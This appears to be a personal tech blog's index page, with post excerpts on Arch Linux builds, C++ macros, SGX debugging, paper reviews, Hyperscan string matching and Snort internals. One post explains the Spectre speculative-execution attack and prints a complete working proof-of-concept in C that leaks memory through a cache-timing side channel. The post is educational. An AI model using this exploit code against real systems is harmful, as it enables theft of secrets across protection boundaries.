Home on Xiangyi's Blog

Build ATLAS under Arch Linux

Thu, 18 Nov 2021 16:17:06 +0800

Original post: https://aur.archlinux.org/packages/atlas-lapack/?O=10&PP=20#comment-599526

Hey, I just installed this and made these notes, which might be useful for somebody else. There is a good explanation on the ATLAS site: http://math-atlas.sourceforge.net/atlas_install/node5.html

Follow this first; without it, the governor set by cpupower has no real control over the CPU: http://unix.stackexchange.com/questions/121410/setting-cpu-governor-to-on-demand-or-conservative Summary: http://vincent.jousse.org/tech/archlinux-compile-lapack-atlas-kaldi/

===========Steps===========
Permanently disable intel_pstate:

$ vi /etc/default/grub  
GRUB_CMDLINE_LINUX_DEFAULT="intel_pstate=disable"

and update grub:

$ grub-mkconfig -o /boot/grub/grub.cfg

Then enable the acpi-cpufreq module:

su root
echo "acpi-cpufreq" > /etc/modules-load.d/acpi-cpufreq.conf

Then reboot.

Now cpupower can set frequencies properly.

TextTruth KDD18 Summary

Tue, 09 Nov 2021 15:35:06 +0800

Source paper: TextTruth: An Unsupervised Approach to Discover Trustworthy Information from Multi-Sourced Text Data (KDD '18)

Fundamental Principles of Truth Discovery

If a user provides many trustworthy or true answers, that user's reliability is high
If an answer is supported by many reliable users, the answer is more likely to be true

Challenges in text data

Unstructured and noisy
For a factoid question¹, the answer may be multifactorial, and a single text answer usually cannot cover all the factors. This leads to the so-called partially correct phenomenon²
Diversity of word usages. For example, one can use words such as tired or exhausted to describe the symptom of fatigue

Keywords and Factors

Take the question “What are the symptoms of flu?” as a simple example. It may have several answers, such as “One may feel very cold and exhausted”. From answers like this one, we can extract keywords such as “freezing”, “cold”, “tired”, “exhausted”, “runny nose” and “congestion”. Different keywords can clearly carry the same meaning; we call that shared meaning a factor. For example, “cold” and “freezing” belong to the factor “chills”, while “tired” and “exhausted” belong to the factor “fatigue”.

Two C++ Preprocessor Macro Features

Tue, 06 Jul 2021 22:20:36 +0800

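Today I repeatedly ran into two string-related C++ preprocessor features in the open-source project SerenityOS that I had rarely seen before, so I am recording them here (I have probably met them before without them leaving much of an impression; hopefully they will stick this time).

First, look at this code: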

#define ENUMERATE_SYSCALLS(S)     \
    S(yield)                      \
    S(open)                       \
    S(close)                      \
    S(read)                       \
    S(lseek)                      \
    S(kill)                       
    /* remaining syscalls omitted... */ 
    
namespace Syscall {

enum Function {
#undef __ENUMERATE_SYSCALL
#define __ENUMERATE_SYSCALL(x) SC_##x,
    ENUMERATE_SYSCALLS(__ENUMERATE_SYSCALL)
#undef __ENUMERATE_SYSCALL
        __Count
};

constexpr const char* to_string(Function function)
{
    switch (function) {
#undef __ENUMERATE_SYSCALL
#define __ENUMERATE_SYSCALL(x) \
    case SC_##x:               \
        return #x;
        ENUMERATE_SYSCALLS(__ENUMERATE_SYSCALL)
#undef __ENUMERATE_SYSCALL
    default:
        break;
    }
    return "Unknown";
}

} // namespace Syscall

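At first glance this code is easy to understand. The first macro, ENUMERATE_SYSCALLS(S), expands to a series of S(syscall name); what that means exactly can wait. The second macro, however, is puzzling: what is SC_##x? If we set that question aside and keep analyzing the macro definition, its expansion looks trivial: SC_##x,. The next line uses the first macro with S replaced by __ENUMERATE_SYSCALL, so it expands to a series of __ENUMERATE_SYSCALL(syscall name), and expanding once more gives a series of SC_##(syscall name). Together with the surrounding enum definition, the code defines an enumerator for each system call. On second thought, though, C++ identifiers may not contain special characters other than _ (some compilers also accept $), so simply expanding to SC_##open cannot be right.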

Enable SGX Debugging in VS Code

Fri, 04 Jun 2021 17:43:36 +0800

Intel provides sgx-gdb for conveniently debugging SGX applications. However, it can only be used from a terminal, which may be a little hard for beginners. This article shows how to debug SGX applications in VS Code.

Prerequisites

An SGX-compatible Linux system
Visual Studio Code
A full SGX environment (with debug symbols installed; if not, please follow this instruction)
VS Code Extension: Native Debug installed

Steps

Open the SGX project folder in VS Code, and click the Run and Debug icon in the left sidebar (or press Ctrl+Shift+D) to open the RUN AND DEBUG view.
Add a new configuration; a launch.json file will then open.
Copy the following lines to the file:

{
    // Use IntelliSense to learn about possible attributes.
    // Hover to view descriptions of existing attributes.
    // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
    "version": "0.2.0",
    "configurations": [
        {
            "name": "(sgx) Debug",
            "type": "gdb",
            "request": "launch",
            "target": "app",
            "cwd": "${workspaceRoot}/",
            "valuesFormatting": "parseText",
            "gdbpath": "sgx-gdb"
        }
    ]
}

This configuration assumes that your executable is named app and sits in the root directory of your project. If not, please modify the cwd (current working directory) and target (executable binary) values.

Spectre Attack PoC Code Analysis

Thu, 03 Jun 2021 20:24:36 +0800

Ref.: Spectre Attacks: Exploiting Speculative Execution

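I recently came across the Spectre attack, which exploits a flaw in the speculative, out-of-order execution of CPUs. Although the vulnerability was discovered and disclosed back in early 2018, this cache-timing style of attack is still highly instructive, so this post explains how the vulnerability works and how a concrete PoC is implemented.

How It Works

As is well known, modern CPUs have introduced many mechanisms to speed up instruction execution: first pipelining, and later speculative execution, branch prediction and out-of-order execution, which were added to deal with the pipeline stalls caused by instructions taking different numbers of cycles. All of these make the CPU faster, but performance comes at a price: these complex mechanisms inevitably introduce many potential security problems, and the Spectre attack is one of them.

Typically, the final target of a branch depends on a value in memory computed by preceding instructions. To save time, the CPU tries to guess the target, executes it ahead of time, and buffers the result. Once the value becomes available, the CPU either discards or commits the speculative result depending on that value. Unfortunately, speculation is not safe: it can make the CPU access memory regions and registers that should not have been accessed and leave part of their contents (quite possibly sensitive information) in the cache, which introduces side effects that can be observed through a side channel.

How to Attack?

As described above, speculative execution combined with a side channel lets us obtain the contents of memory that should not be accessible. The prerequisite is to make the CPU speculatively execute the wrong branch, so we need a carefully designed way to steer the CPU and the victim into that speculation. This step can be called the training step; typically it is achieved by manipulating the cache state so that the data the CPU needs to decide the actual control flow is evicted (explained in detail with the code later in this post). Speculative execution then makes the CPU read the chosen content, and a side channel that distinguishes cache hits from misses by access time reveals what was in memory. Let us walk through the whole process using a very simple conditional branch as an example: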

if (x < array1_size)
    y = array2[array1[x] * 4096];

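Suppose the snippet above is part of a function that receives an unsigned integer x from an untrusted source. The process running the code has access to an unsigned byte array array1 of size array1_size and a byte array array2 of size 1 MB. The code first bounds-checks x to prevent an out-of-bounds access to array1. Without the check, an out-of-bounds access could trigger an exception or read sensitive memory that should be off limits (by supplying x = (address of the secret byte to read) − (base address of array1)). The table below lists the results of the possible combinations of predicted and actual branch outcome, where rows give the actual outcome and columns give the predicted outcome.

Actual \ Predicted	True	False
True	Fast	Slow
False	Leak	Fast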

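As the table shows, information leaks when the actual outcome is false but the predicted outcome is true. Why? Assume the following conditions hold:

x is maliciously chosen to be out of bounds, such that array1[x] refers to a byte k of the victim's sensitive data;
array1_size and array2 are not cached, but k is;
earlier operations received valid values of x, so the branch predictor assumes that the next check will also be true.

When the compiled code above runs, the processor first compares the malicious value of x against array1_size. Reading array1_size results in a cache miss, and the processor has to wait a long time until the value is loaded from DRAM into a register. In particular, if the branch condition, or an instruction somewhere before the branch, is waiting for an uncached operand, determining the branch outcome may take some time. Meanwhile, the branch predictor assumes the condition is true. The speculative execution logic therefore adds x to the base address of array1 and requests the data at the resulting address from memory. This read hits the cache (k is assumed to be cached) and quickly returns the value of the secret byte k. The speculative execution logic then uses k to compute the address of array2[k * 4096] and sends a request to read this address from memory (resulting in a cache miss).

While the read from array2 is in flight, the branch outcome may finally be determined. The processor then realizes that its speculation was wrong and rolls back its register state. However, the speculative read from array2 affected the cache state in an address-specific way, and the address depends on k. To complete the attack, we can use a cache side channel such as Flush+Reload or Prime+Probe to detect which location of array2 was brought into the cache. This reveals the value of k, because the victim's speculative execution cached array2[k * 4096]. The same goal can also be achieved with Evict+Time.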

PoC Implementation

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h>        /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h>     /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
uint8_t unused2[64]; 
uint8_t array2[256 * 512];

char *secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0;  /* Used so compiler won't optimize out victim_function() */

void victim_function(size_t x) {
	if (x < array1_size) {
		temp &= array2[array1[x] * 512];
	}
}


/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80)  /* assume cache hit if time <= threshold */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
	static int results[256];
	int tries, i, j, k, mix_i;
	unsigned int junk = 0;  /* __rdtscp() expects a pointer to unsigned int */
	size_t training_x, x;
	register uint64_t time1, time2;
	volatile uint8_t *addr;

	for (i = 0; i < 256; i++)
		results[i] = 0;
	for (tries = 999; tries > 0; tries--) {

		/* Flush array2[256*(0..255)] from cache */
		for (i = 0; i < 256; i++)
			_mm_clflush(&array2[i * 512]);  /* intrinsic for clflush instruction */

		/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
		training_x = tries % array1_size;
		for (j = 29; j >= 0; j--) {
			_mm_clflush(&array1_size);
			for (volatile int z = 0; z < 100; z++) {}  /* Delay (can also mfence) */

			/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
			/* Avoid jumps in case those tip off the branch predictor */
			x = ((j % 6) - 1) & ~0xFFFF;   /* Set x=FFF.FF0000 if j%6==0, else x=0 */
			x = (x | (x >> 16));           /* Set x=-1 if j%6==0, else x=0 */
			x = training_x ^ (x & (malicious_x ^ training_x));
			
			/* Call the victim! */
			victim_function(x);
		}

		/* Time reads. Order is lightly mixed up to prevent stride prediction */
		for (i = 0; i < 256; i++) {
			mix_i = ((i * 167) + 13) & 255;
			addr = &array2[mix_i * 512];
			time1 = __rdtscp(&junk);            /* READ TIMER */
			junk = *addr;                       /* MEMORY ACCESS TO TIME */
			time2 = __rdtscp(&junk) - time1;    /* READ TIMER & COMPUTE ELAPSED TIME */
			if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
				results[mix_i]++;  /* cache hit - add +1 to score for this value */
		}

		/* Locate highest & second-highest results tallies in j/k */
		j = k = -1;
		for (i = 0; i < 256; i++) {
			if (j < 0 || results[i] >= results[j]) {
				k = j;
				j = i;
			} else if (k < 0 || results[i] >= results[k]) {
				k = i;
			}
		}
		if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
			break;  /* Clear success if best is >= 2*runner-up + 5, or 2 vs. 0 */
	}
	results[0] ^= junk;  /* use junk so code above won't get optimized out*/
	value[0] = (uint8_t)j;
	score[0] = results[j];
	value[1] = (uint8_t)k;
	score[1] = results[k];
}

int main(int argc, const char **argv) {
	size_t malicious_x=(size_t)(secret-(char*)array1);   /* default for malicious_x */
	int i, score[2], len=40;
	uint8_t value[2];

	for (i = 0; i < sizeof(array2); i++)
		array2[i] = 1;    /* write to array2 so in RAM not copy-on-write zero pages */
	if (argc == 3) {
		sscanf(argv[1], "%p", (void**)(&malicious_x));
		malicious_x -= (size_t)array1;  /* Convert input value into a pointer */
		sscanf(argv[2], "%d", &len);
	}
	
	printf("Reading %d bytes:\n", len);
	while (--len >= 0) {
		printf("Reading at malicious_x = %p... ", (void*)malicious_x);
		readMemoryByte(malicious_x++, value, score);
		printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear"));
		printf("0x%02X='%c' score=%d    ", value[0], 
            (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
		if (score[1] > 0)
			printf("(second best: 0x%02X score=%d)", value[1], score[1]);
		printf("\n");
	}
	return (0);
}

PoC Code Analysis

This is a simple PoC that simulates the theft within a single process. The data we want to steal is:

CCS20 TRUSTORE Paper Review

Sun, 30 May 2021 17:06:36 +0800

TRUSTORE: Side-Channel Resistant Storage for SGX using Intel Hybrid CPU-FPGA

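TRUSTORE was published at CCS '20 in Session 6C (Side Channels). It addresses the problem that current SGX technology is highly vulnerable to side-channel attacks: using an FPGA, it extends the trusted domain from SGX itself to the FPGA and implements a trusted storage module.

Abstract

Existing SGX is vulnerable to side-channel attacks (page faults, caches, branch prediction, speculative execution, and so on). ORAM can in theory protect SGX from side channels, but it suffers from severe performance problems. This paper presents TRUSTORE, which uses an FPGA as a peripheral to implement a trusted storage service and keeps that service fully isolated from side channels. TRUSTORE mainly solves the following three problems:

Extending trust from SGX to the FPGA without changing the system architecture;
Providing a verifiable secure communication channel between SGX applications and the FPGA;
Providing SGX applications with seamless support for multiple operations (how should “seamless” be understood?).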

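Side-Channel Attacks on SGX and the Limitations of Conventional ORAM

Most common side-channel attacks on SGX today are based on storage structures: page-fault attacks, cache attacks (flush+reload, evict+reload, evict+time, and so on), branch-prediction attacks, and speculative-execution attacks. Through these side channels, an attacker can obtain sensitive information that SGX is supposed to protect.

Many ORAM-based methods have been proposed to defend against these attacks. However, for every memory access ORAM has to touch an entire path of its tree (for data of size N, an extra O(log N) memory accesses), which severely limits its performance. Experiments show that ORAM is about two orders of magnitude slower than native enclave execution. Moreover, ORAM slows down exponentially as the size of the accessed data grows.

Because conventional ORAM is so limited as a defense against SGX side channels, preventing those attacks efficiently has become an urgent problem. In fact, most storage-based side-channel attacks on SGX exist because the storage units involved (memory, caches, page tables, branch prediction units, and so on) are shared by different applications on the machine, trusted or not. The authors therefore raise a question: if the storage units used by SGX are isolated from these shared ones, will the corresponding side channels be largely cut off?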

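Introduction to TRUSTORE

Based on this observation, the authors designed TRUSTORE, a trusted storage module inside an FPGA that is isolated from other storage devices. Because TRUSTORE has its own memory, it blocks storage-related side channels by design. While designing TRUSTORE and integrating it with SGX, the authors encountered and solved the following three challenges:

Extending trust from SGX to the FPGA without changing the system architecture;
Providing a high-speed, verifiable secure communication channel between SGX applications and the FPGA;
Providing SGX applications with seamless support for multiple operations (how should “seamless” be understood?).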

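Threat Model

Enclave Assumptions

Assume a user wants to run an application securely on a remote machine using SGX. The attacker knows the application's contents and source code, so the code itself is not sensitive. The data the user supplies to the enclave is sensitive, however, and must be protected against side-channel attacks. TRUSTORE assumes that a single party (for example the enclave application developer) deploys the TRUSTORE service onto the FPGA device. For some services, however, the developer may run multiple enclaves on one machine, and those enclaves may access the same FPGA concurrently.

Hardware Assumptions

TRUSTORE's effectiveness rests on the following hardware-level assumptions: the CPU and FPGA chips have not been tampered with, and their functionality is implemented correctly. The authors also assume that the attacker cannot extract secrets directly from inside the chip package or corrupt its current state. Thermal and power side channels are out of scope for TRUSTORE.

Attacker Capabilities

The attacker has privileged control over the entire software stack (BIOS, OS, VMM, and device drivers). The attacker also controls every peripheral except the FPGA, as well as all non-EPC memory (for example DMA and MMIO buffers). As with the EPC, the attacker cannot directly access the FPGA DRAM protected by TRUSTORE but can still mount related side-channel attacks.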

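Design of TRUSTORE

TRUSTORE consists of two parts, TRUSTLIB and TRUSTMOD.

TRUSTLIB is the module that runs inside the enclave. Its main job is to establish and maintain the communication channel between the enclave program and the trusted storage device (the FPGA).
TRUSTMOD is the module that runs on the FPGA and is the core of the trusted storage. (It implements a key-value store backed by the FPGA's on-board memory, which serves multiple enclaves while using enforced access control to keep each enclave's data secure.)

After introducing these two modules, the paper discusses how to connect and combine them efficiently using MMIO and DMA.

Terminology:

MMIO, memory-mapped I/O: memory and I/O devices share the same address space. MMIO is the most widely used I/O method. It uses the same address bus for memory and I/O devices, and the memory and registers of each I/O device are mapped to associated addresses. When the CPU accesses an address, it may refer to physical memory or to the memory of an I/O device, so the CPU instructions used to access memory can also be used to access I/O devices. Each I/O device monitors the CPU's address bus and responds whenever the CPU accesses an address assigned to it, connecting the data bus to the hardware register of the device being accessed. To accommodate I/O devices, the CPU must reserve an address region for I/O that physical memory cannot use.

DMA, direct memory access: a DMA transfer copies data from one address space to another. The CPU initiates the transfer, but the transfer itself is carried out and completed by the DMA controller. A typical example is moving a block of external memory into faster on-chip memory. Such an operation does not stall the processor, which can be rescheduled to do other work in the meantime. DMA transfers are important for high-performance embedded algorithms and networking. During a DMA transfer the DMA controller controls the bus directly, so bus ownership has to be handed over: before the transfer the CPU gives control of the bus to the DMA controller, and after the transfer the DMA controller should immediately return it to the CPU. A complete DMA transfer goes through four steps: DMA request, DMA response, DMA transfer, and DMA completion.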

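Loading and Verifying TRUSTMOD

TRUSTMOD has to be compiled into a bitstream and loaded onto the FPGA board, so the main problem in this part is how to guarantee its confidentiality and integrity once it has been loaded.

Loading the Bitstream

Through the FPGA's secure boot flow, TRUSTMOD can ensure that the contents of the bitstream cannot be stolen once it is loaded onto the board. Concretely, the developer first prepares the TRUSTMOD bitstream and uploads it to the FPGA vendor to be signed and encrypted (the vendor is assumed to be trusted). The correctly encrypted and signed bitstream is then programmed into the FPGA, which decrypts it and writes it into its own logic fabric. Clearly, though, this only keeps the contents of the programmed bitstream hidden from outsiders; it does not guarantee that the FPGA is always running the correct, trustworthy bitstream. TRUSTMOD therefore borrows from SGX's remote attestation process and, with the help of TRUSTLIB, implements its own verification flow.

Key Management and Verification

Before describing verification, we first introduce the key management scheme, which is shown in Figure 1.

Figure 1: Key management during TRUSTMOD loading

Step ⓪ shows that before shipping, the FPGA vendor provisions each board with three keys $k_{Pub}^{bitstr},k_{Priv}^{bitstr},k_{AES}^{bitstr}$ that underpin secure boot. To enable verification, as step ① shows, TRUSTMOD also generates a key pair $k_{Pub}^{attest},k_{Priv}^{attest}$ before each compilation (so that different TRUSTMOD devices have different keys) and embeds the private key $k_{Priv}^{attest}$ in the compiled bitstream, while the public key is handed to TRUSTLIB for later use; this is step ② in the figure. When the FPGA receives the encrypted and signed TRUSTMOD bitstream, it verifies it and, if verification succeeds, loads the decrypted TRUSTMOD module into the logic array, as in step ③. Next, to establish a trustworthy channel between the CPU and the FPGA, TRUSTLIB initiates verification of TRUSTMOD, as shown in Figure 2.

Figure 2: Verification between TRUSTMOD and TRUSTLIB

To guarantee the freshness of the verification messages, TRUSTLIB first generates a random nonce and sends it to TRUSTMOD. On receiving the nonce, TRUSTMOD signs it with $k_{Priv}^{attest}$ and sends it back to TRUSTLIB for verification. If verification passes, a Diffie–Hellman key exchange begins and ultimately yields a shared key, at which point the secure channel is established. This mechanism ensures that, as long as $k_{Priv}^{attest}$ is not leaked, TRUSTLIB will detect during verification if an attacker has overwritten the FPGA's bitstream.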

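TRUSTMOD's Storage Model

Three issues matter for the storage model. First, how to store: what is the physical and logical organization of the contents in memory? Second, how to manage: who may access the contents, and how? For storage, we need to consider the format in which contents are organized in memory and how they are addressed. For management, we mainly consider access control and how storage requests are served. Third, possible memory fragmentation is also something TRUSTMOD has to deal with.

How to Store

Addressing: owing to the nature of FPGA hardware, TRUSTMOD accesses the FPGA's memory directly, so addressing can simply be defined as direct addressing. Because there are no caches, page tables, or similar structures of the kind that applications on a CPU inevitably involve, the side-channel attack surface is significantly reduced.
Storage format: the address space of the FPGA's on-board memory (DRAM) is linear, so data can be managed simply as a start address plus an offset (that is, the data size). Specifically, TRUSTMOD records all allocated memory in a data structure called the On-Chip Memory Allocation Table (OCMAT), which has the following fields: 1) ID, the unique identifier of a data object, assigned internally by TRUSTMOD; 2) EID, the Enclave ID, the unique identifier of the enclave that owns the data object; 3) on-chip address, the starting physical address of the data object in the FPGA's on-chip memory; 4) length, the size of the data object.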

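How to Manage

TRUSTMOD maintains a FIFO queue that records each enclave's memory operation requests, so requests are served first come, first served. If the queue is full and cannot accept new requests, TRUSTMOD delays sending the ACK signal so that the bus stops accepting new requests.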

Compare the performance between inline assembly and C style Intel intrinsic

Wed, 26 May 2021 11:47:06 +0800

Modern CPUs provide many acceleration instruction sets, such as Intel® SSE, AVX, AVX-512, and more. To make these instructions convenient to use, Intel provides C-style functions (intrinsics) that give access to them, which can be found here. In this article, we compare the performance of those C-style functions with the equivalent inline assembly. The test environment is Visual Studio 2019 on Windows 10.

We use _mm256_add_ps/vaddps as the test case, though I expect other instructions to give similar results. The test code is listed below:

Multithreading Models in Modern Operating Systems

Tue, 25 May 2021 14:55:36 +0800

There are two types of threads to be managed in a modern system: User threads and kernel threads. User threads are supported above the kernel, without kernel support. These are the threads that application programmers would put into and manage in their programs. Kernel threads are supported within the kernel of the OS itself. All modern OSes support kernel level threads, allowing the kernel to perform multiple simultaneous tasks and/or to service multiple kernel system calls simultaneously. In a specific implementation, the user threads must be mapped to kernel threads, using one of the following strategies.

Hyperscan's SIMD MPSM

Tue, 18 May 2021 02:22:06 +0800

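Hyperscan is an open-source, high-performance C++ multi-pattern regular expression matching library developed by Intel together with its collaborators. Its implementation makes heavy use of the SIMD (single instruction, multiple data) instructions of modern CPUs for optimization, and it is commonly used to implement the DPI module of IDS/IPS systems (for example Snort). The Hyperscan project was developed over several years, and its core techniques were published at NSDI '19. This post focuses on the SIMD multi-pattern string matching algorithm in Hyperscan.

In the Hyperscan paper, this SIMD multi-pattern string matching algorithm is called FDR (a nod to Roosevelt…). FDR aims to quickly filter out byte streams that need no detailed matching. Specifically, FDR improves the classic Shift-or algorithm, extending it from exact matching of a single pattern to approximate matching of multiple patterns (with some probability of false positives, FP), and optimizes its performance with a series of SIMD instructions. After the improved Shift-or stage, FDR adds a verification module that uses hashing and exact string matching to filter out the false positives the previous stage may produce. This post first introduces the classic Shift-or algorithm, then the improved multi-pattern Shift-or algorithm in FDR together with an analysis of its details, and finally the verification module.

The Classic Shift-or String Matching Algorithm

The most common string matching algorithm, brute-force matching, resets the pattern to its start after a mismatch and advances the text by one character before trying again. This is intuitive, but it wastes time re-matching substrings that are already known to match from the previous attempt. The KMP algorithm introduces the failure pointer and the next array: by computing and storing, for prefixes of the pattern, the length of the longest common prefix and suffix, it reduces how far matching has to back up on a mismatch and thus the running time. The details of KMP are not repeated here; interested readers can find plenty of material online.

The Shift-and Algorithm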

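Before introducing Shift-or we first introduce Shift-and, because Shift-or is merely an optimized variant of it. Shift-and is somewhat similar in spirit to KMP in that both exploit the relationship between prefixes and suffixes, but Shift-and speeds matching up further by using bitwise operations, which are highly parallel on a computer. Given a pattern P and an input text S, Shift-and maintains a set D of all prefixes of P that match some suffix of the part of S read so far. Each time a new character is read from S, the algorithm immediately updates D; if D contains a string equal to P, the match succeeds. In practice a bit array D is maintained for this purpose. The procedure is summarized as follows:

1. Let m be the length of P. Write the bit array D as D = d[m]...d[1] and let D[j] denote d[j]; initialize D to all zeros;
2. D[j] = 1 if and only if P[1]...P[j] is a suffix of S[1]...S[i] (where S has been read up to position i);
3. If D[m] = 1, S matches P;
4. Update rule for D: after reading S[i+1], D[j+1] = 1 if and only if D[j] = 1 and S[i+1] = P[j+1] (with D[0] taken to be 1, since the empty prefix always matches).

In practice D is updated in a bit-parallel fashion with D = ((D << 1) | 1) & B[S[i+1]], where B is an array of bit arrays with the following property for every character c in P: bit j of B[c] is 1 if and only if P[j] = c, and 0 otherwise. With B defined, the update formula is explained in detail next:

First consider the update rule: D[j+1] = 1 if and only if D[j] = 1 and S[i+1] = P[j+1]. Each bit of D records whether the prefix of P ending at the corresponding position currently matches, so D[j] and D[j+1] are related by a left shift of one bit. During an update, D[j] is either 0 or 1. If D[j] = 0, position j does not match, so by the rule position j+1 cannot match either and D[j+1] must become 0; a left shift expresses exactly this, which is the D << 1 in the formula.
If D[j] = 1, D[j+1] may become 1, so a further check is needed (does S[i+1] = P[j+1] hold?). Before making the check, suppose that it holds; this is equivalent to shifting D left so that the bit D[j] = 1 is passed on to D[j+1]. The shift fills the lowest bit with 0, so we OR the shifted D with 1, giving ((D << 1) | 1); this keeps the lowest bit set, so that a match of the first pattern character can start at every position and no earlier match information is lost. Next the assumption (S[i+1] = P[j+1]) has to be verified. Using the precomputed B, if bit j+1 of B[S[i+1]] is 1 the assumption holds and the 1 received from the previous bit is kept; otherwise it is cleared to 0. This is exactly an AND operation, so the update is D = ((D << 1) | 1) & B[S[i+1]].

Advantages: each bit of the bit array represents one pattern character, and bitwise operations update all of them in parallel inside the CPU, so the algorithm is more efficient than KMP (as long as the pattern fits in a machine word). The C++ implementation is given below: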

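#include <bitset>
#include <cstddef>
#include <string>

// Both functions return the index in `source` of the last character of the
// first match, or -1 if there is no match.
// Assumptions: every character is in A-Za-z and 1 <= pattern.length() <= 64.

// 'A'..'z' spans 58 ASCII code points (52 letters plus the 6 characters
// between 'Z' and 'a'), so a table indexed by c - 'A' needs 58 entries, not 52.
constexpr std::size_t ALPHABET_SPAN = 'z' - 'A' + 1;

// implementation by bitset
int shift_and_bitset(const std::string& source, const std::string& pattern)
{
    std::size_t src_len = source.length(), pat_len = pattern.length();
    if (pat_len == 0 || pat_len > 64)
        return -1;
    std::bitset<64> B[ALPHABET_SPAN]; // B[c][i] is set iff pattern[i] == c
    std::bitset<64> D;                // prefix-matching status, initialized to all zeros

    // initialization of B
    for (std::size_t i = 0; i < pat_len; i++)
    {
        // set bit i of B[pattern[i]] to 1
        B[pattern[i] - 'A'].set(i, true);
    }

    for (std::size_t i = 0; i < src_len; i++)
    {
        D = (D << 1).set(0, true) & B[source[i] - 'A'];
        if (D[pat_len - 1])
        {
            return static_cast<int>(i);
        }
    }

    return -1;
}

// implementation by pure bitwise calculation
int shift_and_bitwise(const std::string& source, const std::string& pattern)
{
    std::size_t src_len = source.length(), pat_len = pattern.length();
    if (pat_len == 0 || pat_len > 64)
        return -1;
    // 1ULL keeps the shift 64 bits wide; a plain int 1 overflows for pat_len > 31
    unsigned long long mask = 1ULL << (pat_len - 1);
    unsigned long long B[ALPHABET_SPAN] = {0};
    unsigned long long D = 0;

    // initialization of B
    for (std::size_t i = 0; i < pat_len; i++)
    {
        // set bit i of B[pattern[i]] to 1
        B[pattern[i] - 'A'] |= (1ULL << i);
    }

    for (std::size_t i = 0; i < src_len; i++)
    {
        D = ((D << 1) | 1) & B[source[i] - 'A'];
        if (D & mask)
        {
            return static_cast<int>(i);
        }
    }

    return -1;
}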

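Compared with the implementation based on the STL bitset, the implementation using integer variables and bitwise operations is more efficient but less readable.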

Snort::Pig Code Insight

Mon, 10 May 2021 22:13:25 +0000

Snort::Pig is the core class of Snort. Each packet thread corresponds to one instance of the Pig class, which can be bound to a data source and handles its incoming packets (decode, pre-process, detect, and take actions). The definition of the Pig class is as follows:

class Pig
{
public:
    Pig() = default;

    void set_index(unsigned index) { idx = index; }

    bool prep(const char* source);
    void start();
    void stop();

    bool queue_command(AnalyzerCommand*, bool orphan = false);
    void reap_commands();

    Analyzer* analyzer = nullptr;
    bool awaiting_privilege_change = false;
    bool requires_privileged_start = true;

private:
    void reap_command(AnalyzerCommand* ac);

    std::thread* athread = nullptr;
    unsigned idx = (unsigned)-1;
};

Snort::Analyzer Code Insight

Sun, 09 May 2021 23:38:19 +0000

Analyzer provides the packet acquisition and processing loop. Since it runs in a different thread, it also provides a command facility to control the thread and swap configuration.

Life Cycle

The Analyzer life cycle is managed as a finite state machine. It will start in the NEW state and will transition to the INITIALIZED state once the object is called as part of spinning off a packet thread. Further transitions will be prompted by commands from the main thread. From INITIALIZED, it will go to STARTED via the START command. Similarly, it will go from STARTED to RUNNING via the RUN command. Finally, it will end up in the STOPPED state when the Analyzer object has finished executing. This can be prompted by the STOP command, but may also happen if the Analyzer finishes its operation for other reasons (such as encountering an error condition). The one other state an Analyzer may be in is PAUSED, which will occur when it receives the PAUSE command while in the RUNNING state. A subsequent RESUME command will switch it back from PAUSED to RUNNING. One of the primary drivers of this state machine pattern is to allow the main thread to have synchronization points with the packet threads such that it can drop privileges at the correct time (based on the limitations of the selected DAQ module) prior to starting packet processing.

Snort Privilege Design

Fri, 07 May 2021 23:38:18 +0000

In a modern operating system, each user or user group has its own privileges. Only a few users or groups can perform certain privileged operations, such as writing to /usr/bin, mounting a device at a specific location, or reading data from a network interface card (NIC). In this article, I take modern Linux as an example and give a comprehensive explanation of the privilege design in Snort.

Snort, as an intrusion detection system, frequently needs to communicate with NICs during its Data AcQuisition (DAQ) process. During those operations, the Snort process must therefore run as a privileged user so that it can perform the necessary privileged operations. However, as stated in Snort::Analyzer Code Insight, and considering Snort's execution procedure, an Analyzer is not always in the DAQ process, nor always in the RUNNING state. This implies that the process does not need privileges all the time.

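Value Categories and References in C++

Mon, 03 May 2021 23:38:22 +0000

Every C++ expression (operators and operands, literals, variable names, and so on) has two distinct properties: a type and a value category (do not confuse the two). Types are the familiar int, float, double, or compound types such as struct and class. This post discusses value categories, a well-worn topic that many people nevertheless overlook. Put simply, there are two value categories, lvalue and rvalue (they can be subdivided further into prvalue, xvalue, glvalue and so on, but that goes deeper than this post needs, so it is not covered here). An lvalue, as the name suggests, is a value that can appear on the left of an assignment (not entirely accurate, but helpful for understanding); it can therefore be assigned to, which means it has a name and a corresponding address and can appear in multiple expressions. An rvalue can, for now, be understood as a value that appears on the right of an assignment, that is, a temporary (object). An rvalue has no name of its own and cannot be reused across multiple expressions. Many people therefore assume that an rvalue cannot be modified and stays unchanged for its whole lifetime. That is not so; consider the following expression: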

T().set().get();

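T is a class, set assigns a value to one of its member variables, and get returns the value of that member. After the constructor call T() yields an instance of T (an rvalue at this point), set modifies it. So rvalues can be modified. For values that can be modified but have no name, it is natural to introduce a kind of reference.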

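Rvalue References

C++11 introduced rvalue references. To distinguish them from lvalue references, written ‘&’, C++11 writes rvalue references with two ampersands, ‘&&’. They are declared as follows: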

int &&x = 1;

Enable Software Controlled SGX in Ubuntu

Fri, 25 Sep 2020 13:45:12 +0000

Intel® Software Guard Extensions (SGX) is a hardware-based isolation and memory encryption mechanism provided by modern Intel® CPUs. Normally, it is disabled in the BIOS by the manufacturer of your motherboard. In order to use it, the SGX option in the BIOS must be set to Enable or Software Controlled.

